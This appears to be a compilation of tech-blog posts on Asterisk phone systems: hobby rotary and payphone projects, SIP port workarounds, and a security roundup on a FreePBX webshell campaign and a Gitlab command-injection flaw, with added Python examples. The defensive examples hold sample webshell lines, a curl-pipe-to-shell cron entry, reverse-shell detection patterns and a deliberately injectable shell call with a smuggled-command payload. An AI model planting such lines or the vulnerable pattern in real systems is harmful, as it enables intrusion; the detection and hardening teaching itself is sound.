FLOSS Weekly Episode 777: Asterisk — Wait, Faxes?

This week Jonathan Bennett and David Ruggles sit down with Joshua Colp to talk about Asterisk! That’s the Open Source phone system software you already interact with without realizing it. It started as a side project to run the phones for Linux Support Services, and it turned out working on phone systems was more fun than supporting Linux. The project grew, and in the years since has landed at Sangoma, where Joshua holds the title of Asterisk Project Lead.

Asterisk is used in call centers, business phone systems, and telecom appliances around the world. But how does it handle faxes, WebRTC, and stopping spam calls? Just kidding on that last one, still an unsolved problem.


A Dial Phone SIPs Asterisk

An endless source of amusement for those of advancing years can come from handing a rotary phone to a teenager and asking them to dial a number with it. It’s rare for them to be stumped by a piece of technology, after all. [Mnutt]’s 4-year-old son had no such problems when he saw rotary phones at an art exhibition, so what was a parent to do but wire the phone to an Asterisk PBX with shortcut numbers for calls to family and such essential services as a joke line, MTA status, or even a K-pop song.

It’s possible to hook up a pulse dial phone with a SLIC module and a microcontroller, but in this case, a Grandstream SIP box did the trick. These are all-in-one devices that implement a SIP client with a physical connection, and older ones will talk to pulse dialers as well as the more usual tone dialing phones. The phone in question is a vintage American model. Writing this from Europe we were surprised to find it a little simpler inside than its transatlantic counterparts of the same era.

An Asterisk install on a Raspberry Pi completed the project, and thus it became a matter of software configuration. It’s a useful run-through for Asterisk dilettantes, even if you haven’t got a 4-year-old. Perhaps you have an old payphone or two!

This Week In Security: Asterisk, TikTok, Gitlab, And Finally A Spam Solution

There’s an ongoing campaign that’s compromising FreePBX systems around the world. It seems to be aimed specifically at Elastix systems, using CVE-2021-45461, a really nasty Remote Code Execution (RCE) from December of last year. This flaw was a 0-day, as it was discovered by analyzing a compromised FreePBX system. It’s unclear if the campaign described in last week’s report was using the 0-day back in December, or if it was launched as a result of the public disclosure of the bug.

Regardless, the flaw is triggered by a URL parameter sent to the Rest Phone Apps service. This module is intended to run right on the screen of VoIP phones, and allow end users to set features like Do Not Disturb without having to punch in star codes, or visit a web page. Because of the use case, any FreePBX deployment that supports VoIP phones connecting from outside the network, and that uses this feature, would need the module’s ports reachable from the Internet. The best way to secure that would be to enforce connections over a VPN, which only some phones natively support.

Upon finding a vulnerable endpoint, the campaign starts by dropping a webshell in several locations, all obfuscated slightly differently. It then creates multiple root-level user accounts, and adds a Cron job to maintain access. This malware family uses a surprising amount of obfuscation and several stealth features, making it difficult to point to a single Indicator Of Compromise. If you run a FreePBX system that may have the Phone Apps module running, it’s time to go through it with a fine-toothed comb.
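Going through a box with a fine-toothed comb means checking the three things the campaign touches: extra UID-0 accounts in /etc/passwd, persistence in cron, and PHP files under the web root that look like webshells. The script below is an added example, not part of the article or of any published IOC list; the sample passwd, crontab and PHP contents are constructed for illustration, the module path names are hypothetical, and the regexes are generic heuristics rather than signatures for this particular campaign (which, as the article notes, varies its obfuscation from drop to drop).

```python
import re
from typing import Dict, List

# Constructed sample data standing in for /etc/passwd, root's crontab and a few files
# under the FreePBX web root. Illustrative only; not the campaign's real indicators.
SAMPLE_PASSWD = """root:x:0:0:root:/root:/bin/bash
asterisk:x:1001:1001::/var/lib/asterisk:/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
sysadm:x:0:0::/tmp:/bin/bash
backup-svc:x:0:1000::/var/tmp:/bin/sh
"""

SAMPLE_CRONTAB = """# m h dom mon dow command
0 3 * * * /usr/sbin/logrotate /etc/logrotate.conf
*/5 * * * * curl -s http://198.51.100.7/x.sh | sh
*/10 * * * * php -r 'eval(base64_decode("cGhwaW5mbygpOw=="));'
"""

SAMPLE_PHP_FILES: Dict[str, str] = {   # hypothetical paths
    "/var/www/html/admin/modules/restapps/functions.inc.php":
        "<?php\nfunction restapps_enabled() { return true; }\n",
    "/var/www/html/admin/assets/js/.s.php":
        "<?php $a='ba'.'se64_de'.'code'; @eval($a($_POST['x']));\n",
    "/var/www/html/recordings/theme/cache.php":
        "<?php $f=$_GET['c']; system($f);\n",
}


def find_extra_uid0(passwd_text: str) -> List[str]:
    """Any UID-0 account other than root is a finding on a PBX appliance."""
    extra = []
    for line in passwd_text.splitlines():
        parts = line.split(":")
        if len(parts) >= 3 and parts[2] == "0" and parts[0] != "root":
            extra.append(parts[0])
    return extra


CRON_SUSPECT = re.compile(
    r"(curl|wget)\b.*\|\s*(ba)?sh\b"      # download-and-pipe-to-shell
    r"|base64_decode|\beval\s*\("         # encoded / evaluated payloads
    r"|/dev/tcp/|\bnc\b.*-e\b",           # reverse-shell idioms
    re.I)


def find_suspicious_cron(crontab_text: str) -> List[str]:
    """Return crontab lines (comments skipped) matching the heuristics above."""
    return [line for line in crontab_text.splitlines()
            if not line.lstrip().startswith("#") and CRON_SUSPECT.search(line)]


PHP_SINK = re.compile(r"\b(eval|assert|system|passthru|shell_exec|exec|popen|proc_open)\s*\(", re.I)
PHP_INPUT = re.compile(r"\$_(POST|GET|REQUEST|COOKIE|FILES)\b")
# Split-string function names ('ba'.'se64_de'.'code') and decoder calls are common webshell tells.
PHP_OBFUSCATION = re.compile(r"base64_decode|gzinflate|str_rot13|'\w{1,12}'\s*\.\s*'\w{1,12}'", re.I)


def find_webshells(files: Dict[str, str]) -> Dict[str, List[str]]:
    """Map each suspicious path to the reasons it was flagged."""
    flagged: Dict[str, List[str]] = {}
    for path, body in files.items():
        reasons = []
        if path.rsplit("/", 1)[-1].startswith("."):
            reasons.append("hidden filename")
        if PHP_SINK.search(body) and PHP_INPUT.search(body):
            reasons.append("request input reaches a code/command sink")
        if PHP_SINK.search(body) and PHP_OBFUSCATION.search(body):
            reasons.append("obfuscated call near a sink")
        if reasons:
            flagged[path] = reasons
    return flagged


def triage(passwd_text: str, crontab_text: str, files: Dict[str, str]) -> Dict[str, object]:
    """One report a responder can eyeball; on a live host, feed it the real files."""
    return {"extra_uid0": find_extra_uid0(passwd_text),
            "cron": find_suspicious_cron(crontab_text),
            "webshells": find_webshells(files)}


if __name__ == "__main__":
    for key, value in triage(SAMPLE_PASSWD, SAMPLE_CRONTAB, SAMPLE_PHP_FILES).items():
        print(f"{key}: {value}")
```

On a real FreePBX host you would walk the web root with os.walk, read /etc/passwd and every crontab (system, root, asterisk), and treat any hit as a reason to image the box rather than to clean it in place, since the article is explicit that the dropper leaves several differently obfuscated copies.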

What’s The Deal with TikTok?

The FCC has once again called for TikTok to be de-listed from the Google Play Store and the Apple App store. What is going on with TikTok? It’s just an app for filming and sharing silly videos, right? There are essentially two potential problems with TikTok, and both of them trace back to the app’s parent company residing in China.

Here in the US we have National Security Letters, and China seems to have a more straightforward system, where “everything is seen in China,” as said by a member of TikTok’s Trust and Safety Department. TikTok uses quite a few permissions, some of which seem a bit overzealous. If you’re a person of interest to the Chinese government, could those permissions be used to surveil you? Absolutely. Just like a US based app could, as a result of a National Security Letter.

The second problem is a bit more subtle, and may stray towards a conspiracy theory, but is worth considering. TikTok has videos about every subject imaginable, from every possible viewpoint. What if the Chinese Communist Party (CCP) wanted a specific rumor to gain traction in the US? Just a little pressure on the video recommendation algorithm would make videos about that topic trend. Instant public opinion lever.

There’s likely a missing piece of the story here, in the form of some classified intel. Until enough time goes by that a Freedom of Information Act request can unlock the rest of the story, it’s going to be unclear how much of the TikTok threat is legitimate, and how much is geo-political wrangling.

Oh, and if you thought you could just go open up the Google Play Store and see the exact permissions the TikTok app uses, Google has made the unfortunate decision to hide permissions until you actually do the install. That sounds like a terrible decision and, after a brief outcry, it seems like Google agrees. Just before this article went to the presses, Google announced that they were walking back this decision.

Gitlab RCE

Gitlab fixed a very serious problem in its 4th of July round of minor version releases, and [Nguyễn Tiến Giang (Jang)] really wanted to understand what was going on with this one. So much so, that he set up a debuggable install of Gitlab and recreated the issue, bringing us along for the ride. The flaw is in importing an existing Gitlab project, where the archive name is appended directly to a command string. If you can manipulate the value given for the archive name, and avoid tripping on any of the checks intended to prevent it, you can trivially insert shell commands that will be run on the underlying server. Avoiding the traps is a big part of the work to actually turn this into a real PoC. Read the post for full details on the debugging journey.
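The bug class is worth seeing side by side with its fix. The snippet below is an added example written for this page, not Gitlab’s code (Gitlab is written in Ruby; this is Python, and the “import step” is modelled as simply listing an archive with tar). It shows the vulnerable pattern of splicing an untrusted archive name into a shell string, the quoting band-aid, and the proper fix: an allowlist on the name plus an argument vector so no shell ever parses it. The allowlist pattern and the payload are assumptions for the example.

```python
import re
import shlex
import subprocess

# Hypothetical stand-in for the import step: list an uploaded archive's contents with tar.
# None of this is Gitlab's code; it reproduces the bug class in Python.


def list_archive_vulnerable(archive_name: str) -> str:
    """The untrusted archive name is spliced straight into a shell command line."""
    proc = subprocess.run(f"tar -tzf {archive_name}", shell=True,
                          capture_output=True, text=True)
    return proc.stdout


def list_archive_quoted(archive_name: str) -> str:
    """Still a shell string, but shlex.quote turns the name into a single shell word."""
    proc = subprocess.run(f"tar -tzf {shlex.quote(archive_name)}", shell=True,
                          capture_output=True, text=True)
    return proc.stdout


# Allowlist for what an archive name may look like (an assumption for this example):
# starts with a letter or digit, so it can never be mistaken for an option, and has no
# path separators or shell metacharacters at all.
ARCHIVE_NAME_RE = re.compile(r"[A-Za-z0-9][A-Za-z0-9._-]{0,127}\.tar\.gz")


def validate_archive_name(archive_name: str) -> str:
    """Reject anything that is not a plain file name; raises ValueError on rejection."""
    if not ARCHIVE_NAME_RE.fullmatch(archive_name) or ".." in archive_name:
        raise ValueError(f"rejected archive name: {archive_name!r}")
    return archive_name


def list_archive_hardened(archive_name: str) -> str:
    """Validate first, then run tar with an argument vector so no shell parses the name."""
    name = validate_archive_name(archive_name)
    proc = subprocess.run(["tar", "-tzf", name], capture_output=True, text=True)
    return proc.stdout


# Constructed payload: the 'archive name' smuggles a second command after the separator.
PAYLOAD = "project.tar.gz; echo INJECTED"

if __name__ == "__main__":
    print("vulnerable:", repr(list_archive_vulnerable(PAYLOAD)))   # INJECTED appears
    print("quoted:    ", repr(list_archive_quoted(PAYLOAD)))       # no INJECTED
    try:
        list_archive_hardened(PAYLOAD)
    except ValueError as err:
        print("hardened:  ", err)
```

The quoted variant stops this payload, but quoting is the fragile option: it has to be applied at every splice point and is exactly the kind of check the write-up describes having to route around. Validation plus an argv list removes the shell from the picture entirely, which is why it is the fix to reach for.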

Calendar Spam Finally Fixed

Consider yourself lucky if you’ve missed out on the scourge that is Calendar spam. Google Calendar is great, because anyone can send you an email with an invite, and the event automatically shows up on your calendar. In retrospect, it seems obvious that this would be used for spam. Regardless, after multiple years of the spam problem, Google is finally rolling out a feature to only add invitations to your calendar from known senders. Now if you get asked, or suffer from spam yourself, you know to look under event settings, and make the setting change. Finally!

Convert A Rotary Phone To VOIP Using Raspberry Pi

There’s something so nostalgic about the rotary phone that makes it a fun thing to hack and modernize. [Voidon] put his skills to the test and converted one to VoIP using a Raspberry Pi. He used the RasPi’s GPIO pins to read pulses from the rotary dial – a functional dial is always a welcome feature in rotary phone hacks. An old USB sound card was perfect for the microphone and handset audio.

As with any build, there were unexpected size issues that needed to be worked around. While the RasPi fit inside the case well, there was no room for the USB power jack or an ethernet cable, let alone a USB power bank for portability. The power bank idea was scrapped. [Voidon] soldered the power cord to the RasPi before the polyfuse to preserve the surge protection, used a mini-USB wifi dongle, and soldered a new USB connector to the sound card. [Voidon] also couldn’t get the phone’s original ringer to work, so he used the Raspberry Pi’s internal sound card to play ringtones.

The VoIP (SIP) side is handled by some Python scripting, available on GitHub. [Voidon] has some experience in using Asterisk at his day job, so it will be interesting to see if he incorporates it in the future.

[via Reddit]

Bypassing Broken SIP ALG Implementations

The SIP protocol is commonly used for IP telephone communications. Unfortunately it’s notorious for having issues with NAT traversal. Even some major vendors can’t seem to get it right. [Stephen] had this problem with his Cisco WRVS4400N router. After a bit of troubleshooting, he was able to come up with a workaround that others may find useful.

The router had built-in SIP ALG functionality, but it just didn’t work. [Stephen] was trying to route SIP traffic from a phone to an Asterisk PBX system behind the router. The router just couldn’t properly handle these packets regardless of whether SIP ALG was enabled or disabled.

[Stephen] first tried to change the SIP port on the external VOIP phone from the default of 5060 to something else. Then he set up port forwarding on the router to forward the traffic to the Asterisk system on the original port. This sort of worked. The calls would go through but they would eventually drop after about 20 seconds.

The only thing that [Stephen] could get to work completely was to change the SIP port in Asterisk’s sip.conf file using the “bindport” directive. He changed it to some random unused high port number. Then he set up port forwarding on the router to forward incoming UDP packets on that port to the Asterisk system. This worked fine, but now all of the original phones behind the router stopped working because they were configured to use the default port of 5060.

Rather than re-configure all of the phones in the organization, [Stephen] made one change on the Asterisk system. He set up an iptables rule to forward all incoming traffic on UDP port 5060 to the new SIP port. Now all of the phones are working with minimal changes across the organization. It’s a lot of hassle to go through just because the router couldn’t handle SIP correctly, but it gets the job done.
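The failure mode in this setup is obvious in hindsight: change bindport and forget (or mistype) the iptables redirect, and every phone on 5060 silently stops registering. The script below is an added example, not [Stephen]’s code; it parses a sip.conf and an iptables-save dump and cross-checks that the port Asterisk listens on matches the port 5060 is redirected to, printing the rule to apply when it is missing. The sample config and rule are constructed; the redirect is assumed to be a nat-table REDIRECT rule, which is the usual way to do this on the Asterisk host itself. Note that bindport belongs to the old chan_sip driver; current Asterisk releases use chan_pjsip, where the listening port lives in a transport section of pjsip.conf instead.

```python
import re
from typing import List, Tuple

# Constructed sample configuration: chan_sip moved off 5060 to dodge the router's broken ALG...
SAMPLE_SIP_CONF = """[general]
context=default
bindaddr=0.0.0.0
bindport=47321   ; moved off 5060 to dodge the router's broken SIP ALG
disallow=all
allow=ulaw

[phone1]
type=friend
secret=CHANGE-ME
host=dynamic
"""

# ...and the iptables-save output (nat table) with the redirect that keeps 5060 phones working.
SAMPLE_IPTABLES_SAVE = """*nat
:PREROUTING ACCEPT [0:0]
:POSTROUTING ACCEPT [0:0]
-A PREROUTING -p udp -m udp --dport 5060 -j REDIRECT --to-ports 47321
COMMIT
"""

DEFAULT_SIP_PORT = 5060


def parse_bindport(sip_conf: str) -> int:
    """Read bindport from the [general] section; chan_sip defaults to 5060 when it is unset."""
    section = None
    for raw in sip_conf.splitlines():
        line = raw.split(";", 1)[0].strip()          # drop comments and whitespace
        if not line:
            continue
        if line.startswith("[") and line.endswith("]"):
            section = line[1:-1]
            continue
        if section == "general" and "=" in line:
            key, value = (part.strip() for part in line.split("=", 1))
            if key == "bindport":
                return int(value)
    return DEFAULT_SIP_PORT


REDIRECT_RE = re.compile(r"^-A PREROUTING .*-p udp .*--dport (\d+) -j REDIRECT --to-ports (\d+)")


def parse_udp_redirects(iptables_save: str) -> List[Tuple[int, int]]:
    """Return (dport, to_port) for every UDP REDIRECT in the PREROUTING chain."""
    found = []
    for line in iptables_save.splitlines():
        match = REDIRECT_RE.match(line.strip())
        if match:
            found.append((int(match.group(1)), int(match.group(2))))
    return found


def redirect_rule(bindport: int) -> str:
    """The rule that sends default-port SIP traffic to the relocated listener."""
    return (f"iptables -t nat -A PREROUTING -p udp --dport {DEFAULT_SIP_PORT} "
            f"-j REDIRECT --to-ports {bindport}")


def check_sip_port_setup(sip_conf: str, iptables_save: str) -> List[str]:
    """Empty list when bindport and the 5060 redirect agree; otherwise human-readable findings."""
    findings: List[str] = []
    bindport = parse_bindport(sip_conf)
    if bindport == DEFAULT_SIP_PORT:
        return findings                              # nothing moved, nothing to redirect
    matching = [r for r in parse_udp_redirects(iptables_save) if r[0] == DEFAULT_SIP_PORT]
    if not matching:
        findings.append(f"bindport is {bindport} but nothing redirects UDP {DEFAULT_SIP_PORT}; "
                        f"phones on the default port will fail to register. Apply: {redirect_rule(bindport)}")
    for _, to_port in matching:
        if to_port != bindport:
            findings.append(f"UDP {DEFAULT_SIP_PORT} is redirected to {to_port} but Asterisk listens on {bindport}")
    return findings


if __name__ == "__main__":
    problems = check_sip_port_setup(SAMPLE_SIP_CONF, SAMPLE_IPTABLES_SAVE)
    print("OK" if not problems else "\n".join(problems))
```

On a live box, feed it open("/etc/asterisk/sip.conf").read() and the output of iptables-save -t nat. Remember that a rule added with iptables alone is gone after a reboot, so the redirect also needs to be persisted by whatever mechanism the distribution uses.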

Breathe New Life Into Payphones With Asterisk

Payphones used to be found on just about every street corner. They were a convenience, now replaced by the ubiquitous mobile phone. These machines were the stomping grounds for many early computer hackers, and as a result hold a place in hacker history. If you’ve ever wanted to re-live the good ol’ days, [hharte’s] project might be for you.

[hharte] has been working to make these old payphones useful again with some custom hardware and software. The project intends to be an interface between a payphone and an Asterisk PBX system. On the hardware side, the controller board is capable of switching various high voltage signals required for coin-line signaling. The controller uses a Teensy microcontroller to detect the hook status as well as to control the relays. The current firmware features are very basic, but functional.

[hharte] also wrote a custom AGI script for Asterisk. This script allows Asterisk to detect the 1700 Hz and 2200 Hz tones transmitted when coins are placed into the machine. The script is also in an early stage, but it will prompt for money and then place the call once 25 cents has been deposited. All of the schematics and code can be found on the project’s GitHub page.
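Detecting those two tones is a small signal-processing job, and it is worth seeing how little code it takes. The block below is an added example written for this page, not [hharte]’s AGI script: it synthesizes constructed 8 kHz audio with dual-tone bursts, runs a Goertzel detector on 10 ms frames (1700 Hz and 2200 Hz both land on exact DFT bins at that frame size, so there is no leakage to fight), groups tone frames into bursts and adds up the deposit. The coin patterns it assumes (nickel one short beep, dime two short beeps, quarter one long beep) and the detection thresholds are assumptions for the example. A real implementation would read the caller’s 8 kHz signed-linear audio from file descriptor 3 under EAGI rather than synthesizing it.

```python
import math
from typing import List, Tuple

RATE = 8000                         # samples per second, the usual telephony rate
FRAME = 80                          # 10 ms analysis frames
COIN_F1, COIN_F2 = 1700.0, 2200.0   # the two coin-deposit tone frequencies named in the post

# Assumed coin signalling (not from the post): nickel = one short beep,
# dime = two short beeps, quarter = one long beep.
SHORT_BEEP_MS, LONG_BEEP_MS = 66, 650
LONG_BEEP_MIN_MS = 300              # anything at least this long is treated as the quarter tone
DIME_MAX_GAP_MS = 150               # two short beeps closer than this count as one dime


def synth_signal(bursts: List[Tuple[int, int]], total_ms: int, amp: float = 0.5) -> List[float]:
    """Constructed test audio: silence with dual-tone bursts at (start_ms, duration_ms)."""
    n = total_ms * RATE // 1000
    samples = [0.0] * n
    for start_ms, dur_ms in bursts:
        first = start_ms * RATE // 1000
        last = min(n, (start_ms + dur_ms) * RATE // 1000)
        for i in range(first, last):
            t = i / RATE
            samples[i] = amp * math.sin(2 * math.pi * COIN_F1 * t) + amp * math.sin(2 * math.pi * COIN_F2 * t)
    return samples


def goertzel_power(frame: List[float], freq: float) -> float:
    """Power of one DFT bin via the Goertzel recurrence (k is an integer bin for 80-sample frames)."""
    n = len(frame)
    k = round(n * freq / RATE)
    coeff = 2.0 * math.cos(2.0 * math.pi * k / n)
    s1 = s2 = 0.0
    for x in frame:
        s0 = x + coeff * s1 - s2
        s2, s1 = s1, s0
    return s1 * s1 + s2 * s2 - coeff * s1 * s2


def frame_has_coin_tone(frame: List[float]) -> bool:
    """Both tones must each carry a large share of the frame's energy (threshold is an assumption)."""
    energy = sum(x * x for x in frame)
    if energy < 1e-6:
        return False
    threshold = energy * len(frame) / 16
    return goertzel_power(frame, COIN_F1) > threshold and goertzel_power(frame, COIN_F2) > threshold


def detect_bursts(samples: List[float]) -> List[Tuple[int, int]]:
    """Group consecutive tone frames into (start_ms, duration_ms) bursts."""
    bursts, in_burst, start = [], False, 0
    frame_ms = FRAME * 1000 // RATE
    nframes = len(samples) // FRAME
    for f in range(nframes):
        on = frame_has_coin_tone(samples[f * FRAME:(f + 1) * FRAME])
        now = f * frame_ms
        if on and not in_burst:
            in_burst, start = True, now
        elif not on and in_burst:
            bursts.append((start, now - start))
            in_burst = False
    if in_burst:
        bursts.append((start, nframes * frame_ms - start))
    return bursts


def classify_coins(bursts: List[Tuple[int, int]]) -> List[int]:
    """Turn burst patterns into cent values using the assumed signalling above."""
    coins, i = [], 0
    while i < len(bursts):
        start, dur = bursts[i]
        if dur >= LONG_BEEP_MIN_MS:
            coins.append(25)
            i += 1
            continue
        nxt = bursts[i + 1] if i + 1 < len(bursts) else None
        if nxt and nxt[1] < LONG_BEEP_MIN_MS and nxt[0] - (start + dur) <= DIME_MAX_GAP_MS:
            coins.append(10)
            i += 2
        else:
            coins.append(5)
            i += 1
    return coins


def deposited_cents(samples: List[float]) -> int:
    return sum(classify_coins(detect_bursts(samples)))


# Constructed deposit: a nickel, a dime (two beeps) and a quarter, 40 cents in all.
SAMPLE_DEPOSIT = [(100, SHORT_BEEP_MS), (400, SHORT_BEEP_MS),
                  (400 + 2 * SHORT_BEEP_MS, SHORT_BEEP_MS), (900, LONG_BEEP_MS)]
SAMPLE_AUDIO = synth_signal(SAMPLE_DEPOSIT, total_ms=1700)

if __name__ == "__main__":
    cents = deposited_cents(SAMPLE_AUDIO)
    print(f"bursts: {detect_bursts(SAMPLE_AUDIO)} -> {cents} cents; "
          f"{'connect the call' if cents >= 25 else 'keep prompting'}")
```

Burst durations come out rounded to the 10 ms frame, which is plenty to separate a 66 ms beep from a 650 ms one. The energy-share test is what keeps speech and line noise from registering as coins: a frame only counts when both tones dominate it, not when one bin happens to be a little above the floor.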

[Thanks mies]

Hacking A Pogoplug Into A $20 PBX

The Pogoplug Series 4 is a little network attached device that makes your external drives accessible remotely. Under the hood of this device is an ARM processor running at 800 MHz, which is supported by the Linux kernel. If you’re looking to build your own PBX on the cheap, [Ward] runs us through the process. Since the Pogoplug 4 is currently available for about $20, it’s a cheap way to play with telephony.

Step one is to convert the Pogoplug to Debian, which mostly requires following instructions carefully. After the Pogoplug is booting Debian, the Incredible PBX bundle can be installed. We’ve seen this bundle running on a Raspberry Pi in the past. Incredible PBX’s preconfigured setup based on Asterisk and FreePBX gives a ton of functionality out of the box.

With your $20 PBX running, there’s a lot that can be done. Google’s Voice service allows unlimited free calling to the USA and Canada. With Internet connectivity, you get email notifications for voicemails, and can query WolframAlpha by voice.